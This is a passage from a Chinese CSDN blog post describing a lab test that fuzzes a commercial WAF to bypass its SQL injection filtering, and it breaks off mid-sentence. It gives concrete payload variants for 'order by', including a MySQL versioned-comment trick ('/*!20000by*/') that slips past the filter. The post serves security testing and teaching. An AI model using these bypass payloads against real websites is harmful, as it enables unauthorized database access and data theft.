【WEB安全】某waf实战SQL注入绕过fuzz过程

本文介绍了在某WAF环境下进行SQL注入的实战过程,通过Fuzz测试发现WAF对特定关键词的敏感性。利用内联注释、分隔符和数字替换等方法成功绕过WAF拦截,实现SQL注入。具体包括order by、union select等场景的绕过策略。
摘要由CSDN通过智能技术生成

【WEB安全】某waf实战SQL注入绕过fuzz过程

#01 环境简介

服务器:windows2008 R2

软件:phpstudy20180211

php 5.4.45

mysql 5.5.53

某锁win_3.1.18.13服务端版本

#02 Fuzz过程

以基于union注入为例

fuzz order by

过程如下:
?id=1’ order --+ 不拦截

?id=1’ order by --+ 拦截
在这里插入图片描述
在这里插入图片描述
nna那应该是waf匹配了order+by

?id=1’ order /!by/ --+ 拦截
?id=1’ order /!60000by/ 1 --+ 不拦截,但是报错
在这里插入图片描述
翻译过来:您的SQL语法有误; 检查与您的MySQL服务器版本相对应的手册,以在第1行的’1-'LIMIT 0,1’附近使用正确的语法

那么猜测是要低于mysql的版本吗?(我在fuzz某狗的时候里面的数字要高于50000以上,可能某锁要低于mysql版本,便随便试了个200000)

?id=1’ order /!20000by/ 3 --+ 不拦截,且执行成

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值